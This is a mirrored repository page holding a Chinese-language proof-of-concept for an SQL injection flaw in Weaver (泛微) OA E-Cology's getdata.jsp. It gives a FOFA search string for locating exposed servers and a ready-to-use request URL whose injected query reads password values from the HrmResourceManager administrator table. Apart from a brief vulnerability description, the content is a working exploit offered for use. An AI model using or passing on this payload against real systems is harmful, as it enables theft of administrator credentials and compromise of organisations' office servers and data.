admin/adysec_POC
1
0
Fork 0
mirror of https://github.com/adysec/POC.git synced 2025-11-05 02:13:47 +00:00
Code Issues Packages Projects Releases Wiki Activity
adysec_POC/wpoc/泛微OA/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md

17 lines
717 B
Markdown
Raw Permalink Normal View History

wy876 POC backup
2025-03-07 18:18:50 +08:00
## 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞
泛微OA E-Cology是一款面向中大型组织的数字化办公产品它基于全新的设计理念和管理思想旨在为中大型组织创建一个全新的高效协同办公环境。泛微OA E-Cology Getdata.jsp存在SQL注入漏洞允许攻击者非法访问和操作数据库可能导致数据泄露、篡改、删除甚至控制整个服务器。
## fofa
```
app="泛微-OAe-cology"
```
## poc
```
http://{{Hostname}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
```
![image-20240523193537075](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202405231935132.png)
Reference in New Issue Copy Permalink